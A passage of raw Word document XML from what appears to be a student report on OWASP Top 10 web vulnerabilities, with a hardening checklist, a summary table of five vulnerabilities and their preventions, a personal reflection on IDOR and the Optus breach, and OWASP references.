        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention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Remove or disable all unnecessary features, ports, services, and accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Change all default credentials immediately after installation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Implement a repeatable hardening process for all environments (dev, staging, production)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure error handling to show generic messages to users — never expose stack traces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly audit configurations and conduct automated security scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Summary Table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2680"/>
        <w:gridCol w:w="2680"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Key Attack Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Prevention</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Malicious SQL in input fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameterized queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential stuffing / brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MFA + strong hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Malicious script injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Output encoding + CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IDOR — manipulating object IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Server-side access checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Default credentials / open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="80"/>
              <w:ind w:left="100"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardening + regular audits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Personal Reflection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A4" w:sz="12"/>
            </w:tcBorders>
            <w:shd w:fill="F0F7FF" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120" w:before="160"/>
              <w:ind w:left="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E3A5F"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Which vulnerability surprised me the most — and why?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="120" w:before="80"/>
              <w:ind w:left="200" w:right="200"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The vulnerability that surprised me the most was Broken Access Control (IDOR). I had always assumed that if a system requires login, it would automatically protect each user's data from other users. Learning that simply changing a number in a URL or API request could expose another person's complete account information — without any hacking tools or technical expertise — was genuinely shocking to me.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160" w:before="80"/>
              <w:ind w:left="200" w:right="200"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The Optus breach example, where 9.8 million customer records were exposed simply by incrementing an ID number, made me realize how a single oversight in server-side validation can have catastrophic consequences at scale. It also made me reflect on my own security assessment experience — during a recent authorized assessment, I tested for similar access control issues and can now appreciate how straightforward these vulnerabilities are to find, yet how severe their impact can be.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following sources were consulted during the research for this report:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2021). OWASP Top 10:2021. https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP. (2021). A01 Broken Access Control. https://owasp.org/Top10/A01_2021-Broken_Access_Control/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP. (2021). A03 Injection. https://owasp.org/Top10/A03_2021-Injection/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP. (2021). A05 Security Misconfiguration. https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP. (2021). A07 Identification and Authentication Failures. https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Krebs, B. (2009). Heartland Payment Systems Suffers Breach. KrebsOnSecurity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Australian Cyber Security Centre. (2022). Optus Data Breach Case Study.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
